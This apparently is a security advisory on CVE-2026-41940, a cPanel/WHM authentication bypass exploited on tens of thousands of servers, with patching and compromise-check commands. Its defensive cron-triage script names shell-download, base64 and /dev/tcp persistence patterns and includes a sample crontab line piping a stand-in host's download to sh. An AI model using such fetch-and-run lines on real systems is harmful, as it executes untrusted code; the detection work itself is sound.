More than 40,000 servers running the widely deployed cPanel and WHM web hosting control panel software have been compromised in an ongoing exploitation campaign, according to new reporting from SecurityWeek. The attacks target CVE-2026-41940, a critical authentication bypass zero-day that was recently patched by WebPros but had already been actively exploited in the wild before a fix was available.
The Vulnerability: CVE-2026-41940
CVE-2026-41940 is a missing authentication vulnerability in WebPros cPanel, WHM, and WP2 (WordPress Squared). The flaw allows unauthenticated remote attackers to bypass the authentication mechanisms protecting the cPanel administrative interface and gain full control over affected hosting servers.
| Detail | Value |
|---|---|
| CVE | CVE-2026-41940 |
| Affected Software | cPanel, WHM, WP2 (WordPress Squared) |
| Vulnerability Type | Missing Authentication |
| Impact | Full administrative access |
| Exploitation | Active — zero-day before patch |
| Patch Status | Available — update immediately |
cPanel is one of the most widely used web hosting control panels in the world, deployed on millions of servers by web hosting providers, managed hosting platforms, and individual server operators. A critical authentication bypass in cPanel effectively hands an attacker the keys to every website, email account, database, and file hosted on the affected server.
Timeline of Exploitation
This vulnerability's exploitation history stretches back through April 2026:
- Late April 2026 — WebPros disclosed CVE-2026-41940 and released an emergency patch; a proof-of-concept (PoC) became available shortly after disclosure
- April 29, 2026 — CISA added the flaw to its Known Exploited Vulnerabilities (KEV) catalog, ordering federal agencies to patch by a May 2026 deadline
- April–May 2026 — The "Sorry" ransomware group was confirmed to be exploiting the flaw in mass attacks against hosting providers
- May 4, 2026 — SecurityWeek reports over 40,000 servers have now been confirmed compromised in the ongoing campaign
The rapid escalation from disclosure to tens of thousands of compromised servers underscores how quickly exploitation scales when critical authentication bypass flaws affect widely deployed software with a large attack surface.
What Attackers Can Do with cPanel Access
Administrative access to a cPanel instance gives attackers complete control over the hosting environment, enabling:
- Website defacement or malware injection across all hosted domains
- Email compromise — accessing or redirecting hosted email accounts for phishing or credential theft
- Database exfiltration — dumping MySQL/PostgreSQL databases containing customer data, credentials, and PII
- Cryptominer installation — leveraging server resources for illicit cryptocurrency mining
- Ransomware deployment — encrypting hosted files and extorting server operators
- Credential harvesting — extracting stored FTP, database, and application credentials
- Pivoting — using compromised servers as launch points for attacks on connected infrastructure
The "Sorry" ransomware group's confirmed exploitation of this flaw for ransomware deployment is particularly alarming for shared hosting providers, where a single compromised cPanel installation can impact hundreds or thousands of individual website operators.
Affected Versions and Patch
WebPros released an emergency patch for CVE-2026-41940 in late April 2026. All cPanel, WHM, and WP2 installations should be updated immediately to the latest patched versions.
Check Your cPanel Version
```bash
# Check installed cPanel version
cat /usr/local/cpanel/version
# Or via WHM interface
# Navigate to: WHM > Server Configuration > Update Preferences
```
Apply the Update
```bash
# Run cPanel update via command line
/scripts/upcp --force
# Verify cPanel-managed packages and reinstall any that are missing or altered
/usr/local/cpanel/scripts/check_cpanel_rpms --fix
```
Verify No Compromise Has Occurred
If your cPanel installation was unpatched during the active exploitation window, perform a thorough compromise assessment:
```bash
# Check for unauthorized admin accounts
whmapi1 listaccts | grep -i admin
# Review cPanel access logs for suspicious authentication patterns
grep "Invalid login" /usr/local/cpanel/logs/access_log | tail -200
# Check for new cron jobs (common persistence mechanism)
crontab -l
# List every local user's crontab; users without one are skipped silently
for user in $(cut -f1 -d: /etc/passwd); do
    echo "=== $user ==="; crontab -u "$user" -l 2>/dev/null
done
```
Mitigation Recommendations
For organizations running cPanel-based hosting infrastructure:
- Patch immediately — Apply the CVE-2026-41940 fix via `/scripts/upcp --force` or through WHM > Update Management
- Enable automatic security updates — Configure cPanel to apply security patches automatically
- Restrict WHM access — Limit WHM administrative interface access to trusted IP ranges via firewall rules
- Audit admin accounts — Review all WHM and cPanel accounts for unauthorized additions
- Enable two-factor authentication — Require 2FA for all cPanel and WHM logins
- Monitor access logs — Set up alerting for authentication anomalies and off-hours administrative access
- Review file integrity — Scan hosted websites for injected malware or webshells
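
The cron-job check in the compromise assessment above only prints each crontab, which on a shared host can mean hundreds of entries to read by eye. The script below is an added example, not code from the original article or from cPanel, that triages entries with a few generic persistence heuristics. The function names, the patterns and the `/var/spool/cron` spool path are assumptions, not indicators reported for this campaign.

```bash
#!/bin/sh
# Added example: heuristic triage of crontab entries (patterns are assumptions,
# not indicators reported for this campaign).

# flag_cron_lines OWNER: read crontab text on stdin and print
# "OWNER<TAB>REASON<TAB>LINE" for each entry matching a heuristic.
flag_cron_lines() {
    awk -v owner="$1" '
        /^[ \t]*#/ || /^[ \t]*$/ { next }                 # comment or blank line
        /^[ \t]*[A-Za-z_][A-Za-z0-9_]*[ \t]*=/ { next }   # VAR=value setting
        {
            reason = ""
            if ($0 ~ /(curl|wget)[^|;]*[|][ \t]*(ba|da|z)?sh/)
                reason = "download-piped-to-shell"
            else if ($0 ~ /base64[ \t]+(-d|--decode)/)
                reason = "base64-decoded-payload"
            else if ($0 ~ /\/dev\/tcp\//)
                reason = "shell-network-redirect"
            else if ($0 ~ /(\/tmp\/|\/var\/tmp\/|\/dev\/shm\/)/)
                reason = "path-in-world-writable-dir"
            if (reason != "") printf "%s\t%s\t%s\n", owner, reason, $0
        }'
}

# audit_cron_dir DIR: run the triage over every per-user file in a cron spool.
audit_cron_dir() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        flag_cron_lines "$(basename "$f")" < "$f"
    done
}

# Constructed sample crontab for demonstration (not real data).
sample_crontab() {
    cat <<'EOF'
# constructed sample
MAILTO=""
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -fsS http://example.invalid/a | sh
@reboot /dev/shm/.cache/run
EOF
}

# Usage: sh cron_triage.sh /var/spool/cron   (RHEL-family spool path; assumption)
if [ "$#" -gt 0 ]; then audit_cron_dir "$1"; else sample_crontab | flag_cron_lines demo; fi
```

Flagged lines are leads for manual review: legitimate jobs can match these patterns, and an entry that matches none of them is not thereby cleared.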
Federal Guidance
CISA's addition of CVE-2026-41940 to the KEV catalog mandates that all US federal civilian executive branch (FCEB) agencies patch by the specified deadline. Non-federal organizations are also strongly advised to treat KEV-listed vulnerabilities as priority patches.
The scale of confirmed compromises — over 40,000 servers — places this among the larger server-side exploitation campaigns of 2026, rivaling historical events like the mass exploitation of Microsoft Exchange ProxyLogon and Log4Shell.